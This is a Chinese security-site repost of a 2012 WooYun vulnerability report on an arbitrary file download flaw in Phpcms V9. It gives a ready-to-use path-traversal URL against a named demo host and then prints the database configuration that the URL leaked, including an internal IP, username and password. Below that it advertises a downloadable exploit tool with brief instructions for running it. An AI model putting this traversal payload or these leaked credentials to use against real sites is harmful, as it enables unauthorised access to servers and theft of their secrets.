热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Phpcms V9 任意文件泄露漏洞 and EXP利用

发布时间:2012-07-29 20:39文章来源:wooyun文章作者:性感的蛐蛐 点击次数:
摘要:漏洞作者: 性感的蛐蛐 提交时间: 2012-07-24 公开时间: 2012-07-29 漏洞类型: 任意文件遍历/下载 简要描述:PHPCMS V9直接爆密码!! 详细说明:没啥想解释的直接上地址吧:http://v9.demo.phpcms.cn/index.php?m=searchc=indexa=public_get_suggest_keyw...

漏洞作者: 性感的蛐蛐

提交时间: 2012-07-24
公开时间: 2012-07-29

漏洞类型: 任意文件遍历/下载

简要描述:PHPCMS V9直接爆密码!!
详细说明:没啥想解释的直接上地址吧:http://v9.demo.phpcms.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

没啥想解释的,好像有点蛋疼了,
 

  1. <?php 
  2.  
  3. return array (  
  4. 'default' => array (  
  5. 'hostname' => '10.150.10.77',  
  6. 'database' => 'v9_demo_phpcms_cn',  
  7. 'username' => 'v9_demo_phpcms_c',  
  8. 'password' => 'KJhSLKHSKJ25423',  
  9. 'tablepre' => 'v9_sso_',  
  10. 'charset' => 'gbk',  
  11. 'type' => 'mysql',  
  12. 'debug' => true,  
  13. 'pconnect' => 0,  
  14. 'autoconnect' => 0  
  15. )  
  16. );  
  17.  
  18. ?> 
  19.  

phpcms V9漏洞利用工具

利用方法:

先打开 1.bat

 

然后 把输入命令 php9 madman.in 回车键

如图:

PHPCMS漏洞证明
 

 

下载地址:

phpcms v9

漏洞证明:

PHPCMS漏洞证明
 

 

标签分类: 源码泄露

上一篇:途途外贸企业网站管理系统多处高危漏洞
下一篇:小鼻子文章管理系统漏洞及shell